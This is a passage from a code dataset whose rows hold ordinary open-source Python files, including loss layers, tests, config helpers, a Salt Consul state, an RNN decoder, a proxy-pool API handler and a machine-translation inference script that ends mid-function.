max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
gluoncv/torch/nn/keypoint_loss.py | RafLit/gluon-cv | 5,447 | 121146 |
"""Loss layers for keypoints that can be inserted to modules"""
import torch
import torch.nn as nn
__all__ = ['WeightedMSELoss', 'HMFocalLoss']
def _sigmoid(x):
y = torch.clamp(x.sigmoid_(), min=1e-4, max=1-1e-4)
return y
class WeightedMSELoss(nn.Module):
"""Weighted MSE loss layer"""
def __init__(self):
super().__init__()
def forward(self, pred, gt, mask):
assert pred.size() == gt.size()
loss = ((pred - gt) **2) * mask
loss = loss.mean()
return loss
class HMFocalLoss(nn.Module):
"""Heatmap Focal Loss layer"""
def __init__(self, alpha, beta):
super(HMFocalLoss, self).__init__()
self.alpha = alpha
self.beta = beta
def forward(self, pred, gt):
pos_inds = gt.eq(1).float()
neg_inds = gt.lt(1).float()
pred = _sigmoid(pred)
neg_weights = torch.pow(1 - gt, self.beta)
pos_loss = torch.log(pred) * torch.pow(1 - pred, self.alpha) * pos_inds
neg_loss = torch.log(1 - pred) * torch.pow(pred, self.alpha) * neg_weights * neg_inds
num_pos = pos_inds.float().sum()
pos_loss = pos_loss.sum()
neg_loss = neg_loss.sum()
if num_pos == 0:
return -neg_loss
else:
return -(pos_loss + neg_loss) / num_pos
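
# Not part of the original gluon-cv module: a minimal, hedged usage sketch showing
# how the loss layers above might be exercised; the tensor shapes and the
# alpha/beta values below are illustrative assumptions only.
if __name__ == '__main__':
    pred = torch.randn(2, 17, 64, 64)   # e.g. batch of 2, 17 keypoint heatmaps
    gt = torch.rand(2, 17, 64, 64)      # ground-truth heatmaps in [0, 1]
    mask = torch.ones_like(gt)          # weight every pixel equally
    print('weighted MSE loss:', WeightedMSELoss()(pred, gt, mask).item())
    # HMFocalLoss applies an in-place sigmoid to its input, so pass a copy of the logits
    print('heatmap focal loss:', HMFocalLoss(alpha=2, beta=4)(pred.clone(), gt).item())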
|
test_tensorflow.py | manailin/tensorflow___examples | 156 | 121167 |
#!/usr/bin/env python
import numpy as np
import tensorflow as tf
train_X = np.linspace(-1, 1, 100)
train_Y = 2 * train_X + np.random.randn(*train_X.shape) * 0.33 + 10
X = tf.placeholder("float")
Y = tf.placeholder("float")
w = tf.Variable(0.0, name="weight")
b = tf.Variable(0.0, name="bias")
cost_op = tf.square(Y - tf.multiply(X, w) - b)
train_op = tf.train.GradientDescentOptimizer(0.01).minimize(cost_op)
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
for i in range(10):
for (x, y) in zip(train_X, train_Y):
sess.run(train_op, feed_dict={X: x, Y: y})
if 1 < sess.run(w) < 3 and 9 < sess.run(b) < 11:
print("Success")
else:
print("Fail")
|
tests/inspectdb/dependent_model/__init__.py | bryancolligan/django-salesforce | 251 | 121197 |
from django.apps import AppConfig
class AutoModelConf(AppConfig):
name = 'tests.inspectdb'
label = 'auto_model'
class DependentModelConf(AppConfig):
name = 'tests.inspectdb.dependent_model'
label = 'dependent_model'
|
src/hivedscheduler/config/hivedscheduler.py | luxius-luminus/pai | 1,417 | 121210 |
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import yaml
class Hivedscheduler:
def __init__(self, cluster_conf, service_conf, default_service_conf):
self.cluster_conf = cluster_conf
self.service_conf = dict(default_service_conf, **service_conf)
def validation_pre(self):
if 'webservice-port' not in self.service_conf:
return False, 'webservice-port is missing in hivedscheduler service configuration'
if 'config' not in self.service_conf:
self.service_conf['config'] = ''
return True, None
def run(self):
self.service_conf['structured-config'] = {}
if self.service_conf['config'] != '':
self.service_conf['structured-config'] = yaml.load(self.service_conf['config'], yaml.SafeLoader)
machine_list = self.cluster_conf['machine-list']
master_ip = [host['hostip'] for host in machine_list if host.get('pai-master') == 'true'][0]
self.service_conf['webservice'] = 'http://{}:{}'.format(master_ip, self.service_conf['webservice-port'])
self.service_conf['config'] = self.service_conf['config'].replace('\n', '\n ')
return self.service_conf
def validation_post(self, conf):
return True, None
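
# Not part of the original pai service config module: a hedged, minimal sketch of
# how Hivedscheduler might be driven with toy configuration dictionaries; all of
# the values below are made up for illustration.
if __name__ == '__main__':
    toy_cluster_conf = {
        'machine-list': [{'hostip': '10.0.0.1', 'pai-master': 'true'}],
    }
    toy_service_conf = {'config': 'physicalCluster:\n  skuTypes: {}\n'}
    toy_defaults = {'webservice-port': 30096}
    scheduler = Hivedscheduler(toy_cluster_conf, toy_service_conf, toy_defaults)
    print(scheduler.validation_pre())  # (True, None) because webservice-port is present
    print(scheduler.run())             # merged conf with webservice URL and re-indented config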
|
cloudbaseinit/tests/plugins/windows/test_sanpolicy.py | andia10240/cloudbase-init | 160 | 121219 |
# Copyright 2015 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
try:
import unittest.mock as mock
except ImportError:
import mock
from cloudbaseinit import constant
from cloudbaseinit.plugins.windows import sanpolicy
from cloudbaseinit.tests import testutils
from cloudbaseinit.utils.windows.storage import base as storage_base
class SANPolicyPluginTests(unittest.TestCase):
def setUp(self):
self._san_policy = sanpolicy.SANPolicyPlugin()
self._san_policy_map = {
constant.SAN_POLICY_ONLINE_STR: storage_base.SAN_POLICY_ONLINE,
constant.SAN_POLICY_OFFLINE_STR: storage_base.SAN_POLICY_OFFLINE,
constant.SAN_POLICY_OFFLINE_SHARED_STR:
storage_base.SAN_POLICY_OFFLINE_SHARED,
}
def test_get_os_requirements(self):
response = self._san_policy.get_os_requirements()
self.assertEqual(response, ('win32', (6, 1)))
@mock.patch('cloudbaseinit.utils.windows.storage.factory'
'.get_storage_manager')
def _test_set_policy(self, policy, mock_storage_factory):
mock_storage_manager = mock.MagicMock()
mock_storage_manager.get_san_policy.return_value = "fake policy"
mock_storage_factory.return_value = mock_storage_manager
with testutils.ConfPatcher('san_policy', policy):
self._san_policy.execute(None, "")
mock_storage_manager.set_san_policy.assert_called_once_with(
self._san_policy_map[policy])
@mock.patch('cloudbaseinit.utils.windows.storage.factory'
'.get_storage_manager')
def _test_set_policy_already_set(self, policy, mock_storage_factory):
mock_storage_manager = mock.MagicMock()
san_policy = self._san_policy_map[policy]
mock_storage_manager.get_san_policy.return_value = san_policy
mock_storage_factory.return_value = mock_storage_manager
with testutils.ConfPatcher('san_policy', policy):
self._san_policy.execute(None, "")
self.assertEqual(mock_storage_manager.call_count, 0)
def test_set_policy_online(self):
self._test_set_policy(constant.SAN_POLICY_ONLINE_STR)
def test_set_policy_offline(self):
self._test_set_policy(constant.SAN_POLICY_OFFLINE_STR)
def test_set_policy_offline_shared(self):
self._test_set_policy(constant.SAN_POLICY_OFFLINE_SHARED_STR)
def test_set_policy_online_already_set(self):
self._test_set_policy_already_set(constant.SAN_POLICY_ONLINE_STR)
def test_set_policy_offline_already_set(self):
self._test_set_policy_already_set(constant.SAN_POLICY_OFFLINE_STR)
def test_set_policy_offline_shared_already_set(self):
self._test_set_policy_already_set(
constant.SAN_POLICY_OFFLINE_SHARED_STR)
@mock.patch('cloudbaseinit.utils.windows.storage.factory'
'.get_storage_manager')
def test_san_policy_not_set(self, mock_storage_factory):
self._san_policy.execute(None, "")
self.assertEqual(mock_storage_factory.call_count, 0)
|
salt/_states/consul.py | JulienPalard/psf-salt | 103 | 121224 |
def external_service(name, datacenter, node, address, port, token=None):
ret = {'name': name, 'changes': {}, 'result': False, 'comment': ''}
if token is None:
token = __pillar__['consul']['acl']['tokens']['default']
# Determine if the cluster is ready
if not __salt__["consul.cluster_ready"]():
ret["result"] = True
ret["comment"] = "Consul cluster is not ready."
return ret
# Determine if the node we're attempting to register exists
if __salt__["consul.node_exists"](node, address, dc=datacenter):
# Determine if the service we're attempting to register exists
if __salt__["consul.node_service_exists"](
node, name, port, dc=datacenter):
ret["result"] = True
ret["comment"] = (
"External Service {} already in the desired state.".format(
name,
)
)
return ret
    if __opts__['test']:
ret['comment'] = 'The state of "{0}" will be changed.'.format(name)
ret['changes'] = {
'old': None,
'new': 'External Service {}'.format(name),
}
ret["result"] = None
return ret
__salt__["consul.register_external_service"](
node, address, datacenter, name, port, token,
)
ret["result"] = True
ret["comment"] = "Registered external service: '{}'.".format(name)
ret["changes"] = {
"old": None,
"new": 'External Service {}'.format(name),
}
return ret
|
pxr/usdImaging/usdAppUtils/complexityArgs.py | DougRogers-DigitalFish/USD | 3,680 | 121234 |
#
# Copyright 2019 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "Apache License")
# with the following modification; you may not use this file except in
# compliance with the Apache License and the following modification to it:
# Section 6. Trademarks. is deleted and replaced with:
#
# 6. Trademarks. This License does not grant permission to use the trade
# names, trademarks, service marks, or product names of the Licensor
# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
class RefinementComplexities(object):
"""
An enum-like container of standard complexity settings.
"""
class _RefinementComplexity(object):
"""
Class which represents a level of mesh refinement complexity. Each
level has a string identifier, a display name, and a float complexity
value.
"""
def __init__(self, compId, name, value):
self._id = compId
self._name = name
self._value = value
def __repr__(self):
return self.id
@property
def id(self):
return self._id
@property
def name(self):
return self._name
@property
def value(self):
return self._value
LOW = _RefinementComplexity("low", "Low", 1.0)
MEDIUM = _RefinementComplexity("medium", "Medium", 1.1)
HIGH = _RefinementComplexity("high", "High", 1.2)
VERY_HIGH = _RefinementComplexity("veryhigh", "Very High", 1.3)
_ordered = (LOW, MEDIUM, HIGH, VERY_HIGH)
@classmethod
def ordered(cls):
"""
Get a tuple of all complexity levels in order.
"""
return cls._ordered
@classmethod
def fromId(cls, compId):
"""
Get a complexity from its identifier.
"""
matches = [comp for comp in cls._ordered if comp.id == compId]
if len(matches) == 0:
raise ValueError("No complexity with id '{}'".format(compId))
return matches[0]
@classmethod
def fromName(cls, name):
"""
Get a complexity from its display name.
"""
matches = [comp for comp in cls._ordered if comp.name == name]
if len(matches) == 0:
raise ValueError("No complexity with name '{}'".format(name))
return matches[0]
@classmethod
def next(cls, comp):
"""
Get the next highest level of complexity. If already at the highest
level, return it.
"""
if comp not in cls._ordered:
raise ValueError("Invalid complexity: {}".format(comp))
nextIndex = min(
len(cls._ordered) - 1,
cls._ordered.index(comp) + 1)
return cls._ordered[nextIndex]
@classmethod
def prev(cls, comp):
"""
Get the next lowest level of complexity. If already at the lowest
level, return it.
"""
if comp not in cls._ordered:
raise ValueError("Invalid complexity: {}".format(comp))
prevIndex = max(0, cls._ordered.index(comp) - 1)
return cls._ordered[prevIndex]
def AddCmdlineArgs(argsParser, defaultValue=RefinementComplexities.LOW,
altHelpText=''):
"""
Adds complexity-related command line arguments to argsParser.
The resulting 'complexity' argument will be one of the standard
RefinementComplexities.
"""
helpText = altHelpText
if not helpText:
helpText = ('level of refinement to use (default=%(default)s)')
argsParser.add_argument('--complexity', '-c', action='store',
type=RefinementComplexities.fromId,
default=defaultValue,
choices=[c for c in RefinementComplexities.ordered()],
help=helpText)
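
# Not part of the original USD module: a hedged usage sketch wiring AddCmdlineArgs
# into a bare argparse.ArgumentParser and reading the parsed complexity back.
if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    AddCmdlineArgs(parser, defaultValue=RefinementComplexities.MEDIUM)
    args = parser.parse_args(['--complexity', 'high'])
    # args.complexity is a _RefinementComplexity instance ("high", value 1.2)
    print(args.complexity, args.complexity.value)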
|
neuralmonkey/decoders/decoder.py | ufal/neuralmonkey | 446 | 121259 |
from typing import Any, List, Tuple, cast, NamedTuple
import tensorflow as tf
from typeguard import check_argument_types
from neuralmonkey.decoders.autoregressive import (
AutoregressiveDecoder, DecoderFeedables, DecoderHistories, LoopState)
from neuralmonkey.attention.base_attention import BaseAttention
from neuralmonkey.vocabulary import Vocabulary
from neuralmonkey.model.sequence import EmbeddedSequence
from neuralmonkey.model.stateful import Stateful
from neuralmonkey.model.parameterized import InitializerSpecs
from neuralmonkey.model.model_part import ModelPart
from neuralmonkey.logging import log
from neuralmonkey.nn.ortho_gru_cell import OrthoGRUCell, NematusGRUCell
from neuralmonkey.nn.utils import dropout
from neuralmonkey.tf_utils import append_tensor
from neuralmonkey.decoders.encoder_projection import (
linear_encoder_projection, concat_encoder_projection, empty_initial_state,
EncoderProjection)
from neuralmonkey.decoders.output_projection import (
OutputProjectionSpec, OutputProjection, nonlinear_output)
from neuralmonkey.decorators import tensor
RNN_CELL_TYPES = {
"NematusGRU": NematusGRUCell,
"GRU": OrthoGRUCell,
"LSTM": tf.contrib.rnn.LSTMCell
}
class RNNFeedables(NamedTuple(
"RNNFeedables", [
("prev_rnn_state", tf.Tensor),
("prev_rnn_output", tf.Tensor),
("prev_contexts", List[tf.Tensor])])):
"""Additional feedables used only by the RNN-based decoder.
Attributes:
prev_rnn_state: The recurrent state from the previous step. A tensor
of shape ``(batch, rnn_size)``
prev_rnn_output: The output of the recurrent network from the previous
step. A tensor of shape ``(batch, output_size)``
prev_contexts: A list of context vectors returned from attention
mechanisms. Tensors of shape ``(batch, encoder_state_size)`` for
each attended encoder.
"""
class RNNHistories(NamedTuple(
"RNNHistories", [
("rnn_outputs", tf.Tensor),
("attention_histories", List[Tuple])])):
"""The loop state histories specific for RNN-based decoders.
Attributes:
rnn_outputs: History of outputs produced by RNN cell itself (before
applying output projections).
attention_histories: A list of ``AttentionLoopState`` objects (or
similar) populated by values from the attention mechanisms used in
the decoder.
"""
# pylint: disable=too-many-instance-attributes
class Decoder(AutoregressiveDecoder):
"""A class managing parts of the computation graph used during decoding."""
# pylint: disable=too-many-locals
# pylint: disable=too-many-arguments,too-many-branches,too-many-statements
def __init__(self,
encoders: List[Stateful],
vocabulary: Vocabulary,
data_id: str,
name: str,
max_output_len: int,
dropout_keep_prob: float = 1.0,
embedding_size: int = None,
embeddings_source: EmbeddedSequence = None,
tie_embeddings: bool = False,
label_smoothing: float = None,
rnn_size: int = None,
output_projection: OutputProjectionSpec = None,
encoder_projection: EncoderProjection = None,
attentions: List[BaseAttention] = None,
attention_on_input: bool = False,
rnn_cell: str = "GRU",
conditional_gru: bool = False,
supress_unk: bool = False,
reuse: ModelPart = None,
save_checkpoint: str = None,
load_checkpoint: str = None,
initializers: InitializerSpecs = None) -> None:
"""Create a refactored version of monster decoder.
Arguments:
encoders: Input encoders of the decoder.
vocabulary: Target vocabulary.
data_id: Target data series.
            name: Name of the decoder. Should be unique across all Neural
Monkey objects.
max_output_len: Maximum length of an output sequence.
dropout_keep_prob: Probability of keeping a value during dropout.
embedding_size: Size of embedding vectors for target words.
embeddings_source: Embedded sequence to take embeddings from.
tie_embeddings: Use decoder.embedding_matrix also in place
of the output decoding matrix.
rnn_size: Size of the decoder hidden state, if None set
according to encoders.
output_projection: How to generate distribution over vocabulary
from decoder_outputs.
encoder_projection: How to construct initial state from encoders.
            attentions: List of attention mechanisms to use. Optional.
rnn_cell: RNN Cell used by the decoder (GRU or LSTM).
conditional_gru: Flag whether to use the Conditional GRU
architecture.
attention_on_input: Flag whether attention from previous decoding
step should be combined with the input in the next step.
supress_unk: If true, decoder will not produce symbols for unknown
tokens.
reuse: Reuse the model variables from the given model part.
"""
check_argument_types()
AutoregressiveDecoder.__init__(
self,
name=name,
vocabulary=vocabulary,
data_id=data_id,
max_output_len=max_output_len,
dropout_keep_prob=dropout_keep_prob,
embedding_size=embedding_size,
embeddings_source=embeddings_source,
tie_embeddings=tie_embeddings,
label_smoothing=label_smoothing,
supress_unk=supress_unk,
reuse=reuse,
save_checkpoint=save_checkpoint,
load_checkpoint=load_checkpoint,
initializers=initializers)
self.encoders = encoders
self._output_projection_spec = output_projection
self._conditional_gru = conditional_gru
self._attention_on_input = attention_on_input
self._rnn_cell_str = rnn_cell
self._rnn_size = rnn_size
self._encoder_projection = encoder_projection
self.attentions = [] # type: List[BaseAttention]
if attentions is not None:
self.attentions = attentions
if not rnn_size and not encoder_projection and not encoders:
raise ValueError(
"No RNN size, no encoders and no encoder_projection specified")
if self._rnn_cell_str not in RNN_CELL_TYPES:
raise ValueError("RNN cell must be a either 'GRU', 'LSTM', or "
"'NematusGRU'. Not {}".format(self._rnn_cell_str))
if self._attention_on_input:
self.input_projection = self.input_plus_attention
else:
self.input_projection = (
lambda *args: LoopState(*args).feedables.embedded_input)
with self.use_scope():
with tf.variable_scope("attention_decoder") as self.step_scope:
pass
self._variable_scope.set_initializer(
tf.random_normal_initializer(stddev=0.001))
# pylint: enable=too-many-arguments,too-many-branches,too-many-statements
@property
def encoder_projection(self) -> EncoderProjection:
if self._encoder_projection is not None:
return self._encoder_projection
if not self.encoders:
log("No direct encoder input. Using empty initial state")
return empty_initial_state
if self._rnn_size is None:
log("No rnn_size or encoder_projection: Using concatenation of "
"encoded states")
return concat_encoder_projection
log("Using linear projection of encoders as the initial state")
return linear_encoder_projection(self.dropout_keep_prob)
@property
def rnn_size(self) -> int:
if self._rnn_size is not None:
return self._rnn_size
if self._encoder_projection is None:
assert self.encoders
return sum(e.output.get_shape()[1].value for e in self.encoders)
raise ValueError("Cannot infer RNN size.")
@tensor
def output_projection_spec(self) -> Tuple[OutputProjection, int]:
if self._output_projection_spec is None:
log("No output projection specified - using tanh projection")
return (nonlinear_output(self.rnn_size, tf.tanh)[0], self.rnn_size)
if isinstance(self._output_projection_spec, tuple):
return self._output_projection_spec
return cast(OutputProjection,
self._output_projection_spec), self.rnn_size
# pylint: disable=unsubscriptable-object
@property
def output_projection(self) -> OutputProjection:
return self.output_projection_spec[0]
@property
def output_dimension(self) -> int:
return self.output_projection_spec[1]
# pylint: enable=unsubscriptable-object
@tensor
def initial_state(self) -> tf.Tensor:
"""Compute initial decoder state.
The part of the computation graph that computes
the initial state of the decoder.
"""
with tf.variable_scope("initial_state"):
# pylint: disable=not-callable
initial_state = dropout(
self.encoder_projection(self.train_mode,
self.rnn_size,
self.encoders),
self.dropout_keep_prob,
self.train_mode)
# pylint: enable=not-callable
init_state_shape = initial_state.get_shape()
# Broadcast the initial state to the whole batch if needed
if len(init_state_shape) == 1:
assert init_state_shape[0].value == self.rnn_size
tiles = tf.tile(initial_state,
tf.expand_dims(self.batch_size, 0))
initial_state = tf.reshape(tiles, [-1, self.rnn_size])
return initial_state
def _get_rnn_cell(self) -> tf.contrib.rnn.RNNCell:
return RNN_CELL_TYPES[self._rnn_cell_str](self.rnn_size)
def _get_conditional_gru_cell(self) -> tf.contrib.rnn.GRUCell:
if self._rnn_cell_str == "NematusGRU":
return NematusGRUCell(
self.rnn_size, use_state_bias=True, use_input_bias=False)
return RNN_CELL_TYPES[self._rnn_cell_str](self.rnn_size)
def input_plus_attention(self, *args) -> tf.Tensor:
"""Merge input and previous attentions.
Input and previous attentions are merged into a single vector
        of the size of the embedding.
"""
loop_state = LoopState(*args)
feedables = loop_state.feedables
emb_with_ctx = tf.concat(
[feedables.embedded_input] + feedables.prev_contexts, 1)
return dropout(
tf.layers.dense(emb_with_ctx, self.embedding_size),
self.dropout_keep_prob, self.train_mode)
def next_state(self, loop_state: LoopState) -> Tuple[tf.Tensor, Any, Any]:
rnn_feedables = loop_state.feedables.other
rnn_histories = loop_state.histories.other
with tf.variable_scope(self.step_scope):
rnn_input = self.input_projection(*loop_state)
cell = self._get_rnn_cell()
if self._rnn_cell_str in ["GRU", "NematusGRU"]:
cell_output, next_state = cell(
rnn_input, rnn_feedables.prev_rnn_output)
attns = [
a.attention(
cell_output, rnn_feedables.prev_rnn_output,
rnn_input, att_loop_state)
for a, att_loop_state in zip(
self.attentions,
rnn_histories.attention_histories)]
if self.attentions:
contexts, att_loop_states = zip(*attns)
else:
contexts, att_loop_states = [], []
if self._conditional_gru:
cell_cond = self._get_conditional_gru_cell()
cond_input = tf.concat(contexts, -1)
cell_output, next_state = cell_cond(
cond_input, next_state, scope="cond_gru_2_cell")
elif self._rnn_cell_str == "LSTM":
prev_state = tf.contrib.rnn.LSTMStateTuple(
rnn_feedables.prev_rnn_state,
rnn_feedables.prev_rnn_output)
cell_output, state = cell(rnn_input, prev_state)
next_state = state.c
attns = [
a.attention(
cell_output, rnn_feedables.prev_rnn_output,
rnn_input, att_loop_state)
for a, att_loop_state in zip(
self.attentions,
rnn_histories.attention_histories)]
if self.attentions:
contexts, att_loop_states = zip(*attns)
else:
contexts, att_loop_states = [], []
else:
raise ValueError("Unknown RNN cell.")
# TODO: attention functions should apply dropout on output
# themselves before returning the tensors
contexts = [dropout(ctx, self.dropout_keep_prob, self.train_mode)
for ctx in list(contexts)]
cell_output = dropout(
cell_output, self.dropout_keep_prob, self.train_mode)
with tf.name_scope("rnn_output_projection"):
if self.embedding_size != self.output_dimension:
raise ValueError(
"The dimension ({}) of the output projection must be "
"same as the dimension of the input embedding "
"({})".format(self.output_dimension,
self.embedding_size))
# pylint: disable=not-callable
output = self.output_projection(
cell_output, loop_state.feedables.embedded_input,
list(contexts), self.train_mode)
# pylint: enable=not-callable
new_feedables = RNNFeedables(
prev_rnn_state=next_state,
prev_rnn_output=cell_output,
prev_contexts=list(contexts))
new_histories = RNNHistories(
rnn_outputs=append_tensor(rnn_histories.rnn_outputs, cell_output),
attention_histories=list(att_loop_states))
return (output, new_feedables, new_histories)
def get_initial_feedables(self) -> DecoderFeedables:
feedables = AutoregressiveDecoder.get_initial_feedables(self)
rnn_feedables = RNNFeedables(
prev_contexts=[tf.zeros([self.batch_size, a.context_vector_size])
for a in self.attentions],
prev_rnn_state=self.initial_state,
prev_rnn_output=self.initial_state)
return feedables._replace(other=rnn_feedables)
def get_initial_histories(self) -> DecoderHistories:
histories = AutoregressiveDecoder.get_initial_histories(self)
rnn_histories = RNNHistories(
rnn_outputs=tf.zeros(
shape=[0, self.batch_size, self.rnn_size],
dtype=tf.float32,
name="hist_rnn_output_states"),
attention_histories=[a.initial_loop_state()
for a in self.attentions if a is not None])
return histories._replace(other=rnn_histories)
def finalize_loop(self, final_loop_state: LoopState,
train_mode: bool) -> None:
for att_state, attn_obj in zip(
final_loop_state.histories.other.attention_histories,
self.attentions):
att_history_key = "{}_{}".format(
self.name, "train" if train_mode else "run")
attn_obj.finalize_loop(att_history_key, att_state)
if not train_mode:
attn_obj.visualize_attention(att_history_key)
|
src/api/proxy/proxy.py | a49v033/fp-server | 173 | 121265 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
API for proxy
"""
from core import exceptions
from core.web import WebHandler
from service.proxy.proxy import proxy_srv
from service.proxy.serializers import ProxySerializer
from utils import log as logger
from utils.routes import route
from utils.tools import subdict
def return_developing():
raise exceptions.NotFound(msg=exceptions.ERR_MSG_IS_DEVELOPING)
@route(r'/api/proxy/$')
class GetProxyHandler(WebHandler):
"""
proxy api
"""
async def get(self, *args, **kwargs):
"""
get proxies
"""
count = int(self.get_param('count', 1))
scheme = self.get_param('scheme')
if scheme:
scheme = scheme.lower()
anonymity = self.get_param('anonymity')
spec = dict(count=count, scheme=scheme, anonymity=anonymity)
_items = await proxy_srv.query(spec)
items = []
for i in _items:
s = ProxySerializer(i)
items.append(s.to_representation())
data = {
"count": len(items),
"detail": items,
}
# sort_by_speed = self.get_param('sort_by_speed', 0)
self.do_success(data)
async def post(self, *args, **kwargs):
""" create new proxies
"""
item = self.get_body()
        indispensables = ('scheme', 'ip', 'port')
        print(type(item), item)
        for k in indispensables:
if k not in item:
raise exceptions.ValidationError('%s cannot be empty.' % k)
_f = subdict(item, ['ip', 'port', 'scheme'])
existed = await proxy_srv.keys_by_dict(_f)
if existed:
self.do_success({'success': 0, 'key': existed},
msg='key already existed')
return
try:
_key = await proxy_srv.new_proxy(item)
self.do_success({'success': 1, 'key': _key},
msg='created successfully')
return
except Exception as e:
logger.exception('Failed: %s Detail: %s' % (item, e))
self.do_failed(code=400, msg=str(e))
async def delete(self, *args, **kwargs):
""" delete proxies
"""
self.do_success({'ok': 1}, 'todo')
@route(r'/api/proxy/report/$')
class ReportProxyHandler(WebHandler):
async def post(self, *args, **kwargs):
self.do_success({'ok': 1}, 'developing..')
|
tools/merge.py | mrjrty/rpaframework | 518 | 121276 |
#!/usr/bin/env python3
import argparse
import json
import os
from pathlib import Path
FILENAME = "latest.json"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("source", help="Path to directory of JSONs")
parser.add_argument("destination", help="Path to destination JSON")
args = parser.parse_args()
dirname = Path(args.source)
output = {}
for filename in sorted(os.listdir(dirname)):
if filename == FILENAME:
continue
with open(dirname / filename, "r") as infile:
lib = json.load(infile)
assert lib["name"] not in output, "Duplicate library"
output[lib["name"]] = lib
with open(args.destination, "w") as outfile:
json.dump(output, outfile, indent=4)
if __name__ == "__main__":
main()
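
# Hedged illustration (not part of the original rpaframework tool): each JSON file in
# the source directory is expected to carry at least a top-level "name" key, e.g.
#   {"name": "SomeLibrary", ...}
# Running `python merge.py <source_dir> <destination.json>` then writes one JSON object
# keyed by those names, skipping any file literally named latest.json.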
|
nodes/0.9.x/python/String.ReplaceRegularExpression.py | jdehotin/Clockworkfordynamo | 147 | 121288 |
import clr
import re
regexstring = IN[0]
regexlist = IN[1]
replacement = IN[2]
elementlist = list()
thisexp = re.compile(regexstring)
for item in regexlist:
try:
elementlist.append(thisexp.sub(replacement,item))
except:
elementlist.append(list())
OUT = elementlist
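
# Hedged illustration (not part of the original Clockwork node): outside Dynamo the
# same substitution logic reduces to plain `re`, for example
#   exp = re.compile(r"\d+")
#   [exp.sub("#", s) for s in ["Level 01", "Level 02"]]  ->  ['Level #', 'Level #']
# In Dynamo, IN[0] is the pattern, IN[1] the list of strings, IN[2] the replacement.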
|
mt_infer.py | rcmckee/BPT | 123 | 121297 |
from torchtext import data
from torch.utils.data import DataLoader
from graph import MTInferBatcher, get_mt_dataset, MTDataset, DocumentMTDataset
from modules import make_translate_infer_model
from utils import tensor_to_sequence, average_model
import torch as th
import argparse
import yaml
max_length = 1024
def run(dev_id, config):
_dataset = config['dataset']
if _dataset == 'iwslt':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('iwslt')
_, _, test = dataset.splits(exts=('.tc.zh', '.tc.en'), fields=TEXT, root='./data')
test = DocumentMTDataset(test, context_length=config['context_len'])
vocab_zh, vocab_en = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_zh), len(vocab_en))
vocab_sizes = [len(vocab_zh), len(vocab_en)]
TEXT[0].vocab = vocab_zh
TEXT[1].vocab = vocab_en
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'wmt':
TEXT = data.Field(batch_first=True)
dataset = get_mt_dataset('wmt14')
_, _, test = dataset.splits(exts=['.en', '.de'], fields=[TEXT, TEXT], root='./data')
test = MTDataset(test)
vocab = dataset.load_vocab(root='./data')[0]
print('vocab size: ', len(vocab))
vocab_sizes = [len(vocab)]
TEXT.vocab = vocab
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'multi':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('multi30k')
_, _, test = dataset.splits(exts=['.en.atok', '.de.atok'], fields=TEXT, root='./data')
test = MTDataset(test)
vocab_en, vocab_de = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_en), len(vocab_de))
vocab_sizes = [len(vocab_en), len(vocab_de)]
TEXT[0].vocab = vocab_en
TEXT[1].vocab = vocab_de
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
dim_model = config['dim_model']
dim_ff = config['dim_ff']
num_heads = config['num_heads']
n_layers = config['n_layers']
m_layers = config['m_layers']
dropouti = config['dropouti']
dropouth = config['dropouth']
dropouta = config['dropouta']
